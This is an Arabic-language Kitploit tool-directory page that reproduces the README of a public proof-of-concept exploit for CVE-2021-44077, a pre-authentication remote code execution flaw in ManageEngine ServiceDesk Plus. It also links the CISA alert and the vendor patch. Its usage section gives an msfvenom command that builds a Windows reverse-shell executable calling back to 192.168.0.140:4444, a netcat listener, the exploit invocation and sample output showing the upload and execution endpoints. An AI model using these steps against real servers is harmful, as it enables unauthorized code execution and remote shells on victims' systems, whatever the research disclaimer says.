Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2021-44077 — استغلال إثبات مفهوم لثغرة تنفيذ كود عن بُعد قبل المصادقة (PreAuth RCE) في ManageEngine ServiceDesk Plus (CVE-2021-44077). يرفع وينفذ ملفات ويندوز قابلة للتنفيذ بشكل تعسفي على الأهداف المعرضة للخطر. | Kitploit
أدوات/GitHubGitHub/horizon3ai/cve-2021-44077
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمر
GitHubhorizon3ai/cve-2021-44077

CVE-2021-44077

استغلال إثبات مفهوم لثغرة تنفيذ كود عن بُعد قبل المصادقة (PreAuth RCE) في ManageEngine ServiceDesk Plus (CVE-2021-44077). يرفع وينفذ ملفات ويندوز قابلة للتنفيذ بشكل تعسفي على الأهداف المعرضة للخطر.

عرض المستودع
3692منذ 4 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2021-44077

إثبات المفهوم لاستغلال CVE-2021-44077: PreAuth RCE في ManageEngine ServiceDesk Plus < 11306

بناءً على:

  • https://xz.aliyun.com/t/10631

نشرة CISA:

  • https://www.cisa.gov/uscert/ncas/alerts/aa21-336a

الإصلاح (التحديث إلى الإصدار 11306 أو أحدث):

  • https://www.manageengine.com/products/service-desk/security-response-plan.html

تم الاختبار على ManageEngine ServiceDesk Plus Build 11303. تم تعطيل جميع برامج مكافحة الفيروسات.

الاستخدام

يقوم الاستغلال برفع ملف تنفيذي لنظام ويندوز إلى الهدف وتنفيذه.

لاستغلال الثغرة، قم أولاً بتوليد أي ملف تنفيذي. على سبيل المثال:

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.140 LPORT=4444 -f exe > msiexec.exe

قم بتثبيت ملف المتطلبات باستخدام pip install أو تأكد من تثبيت حزمة requests.

إذا كنت تحاول استقبال شل عكسية، قم بتشغيل المستمع أولاً، مثلاً:

nc -l 4444

ثم قم بتشغيل سكريبت الاستغلال، مع تمرير وسيطي url و exe، مثلاً:

python exploit.py http://<TARGET>:<PORT> <path_to_exe>

مثال على إخراج السكريبت:

% python exploit.py http://192.168.0.140:8080 msiexec.exe
[+] Target: http://192.168.0.140:8080/
[+] Executable: msiexec.exe
[+] Uploading msiexec.exe to http://192.168.0.140:8080/RestAPI/ImportTechnicians?step=1
[+] Got 401 error code on upload. This is expected.
[+] Uploaded msiexec.exe
[+] Attempting to invoke against url http://192.168.0.140:8080/./RestAPI/s247action. Waiting up to 20 seconds...
[+] Done, did it work?

Proof

ملاحظات الاستغلال

  • الثغرة تتيح لك رفع أي ملف إلى دليل التثبيت bin، بما في ذلك الملفات الموجودة مثل نصوص الدفعات. قد توجد طرق أخرى لاستدعاء الملف المرفوع.
  • رفع قشرة ويب مباشرة يبدو أنه ممنوع بواسطة مرشح.

إخلاء مسؤولية

تم إنشاء هذا البرنامج لأغراض البحث الأكاديمي وتطوير تقنيات دفاعية فعالة فقط، وليس الغرض منه استخدامه لمهاجمة الأنظمة إلا في حالة التصريح بذلك صراحةً. القائمون على المشروع ليسوا مسؤولين عن سوء استخدام البرنامج. استخدمه بمسؤولية.

تنزيل الأداة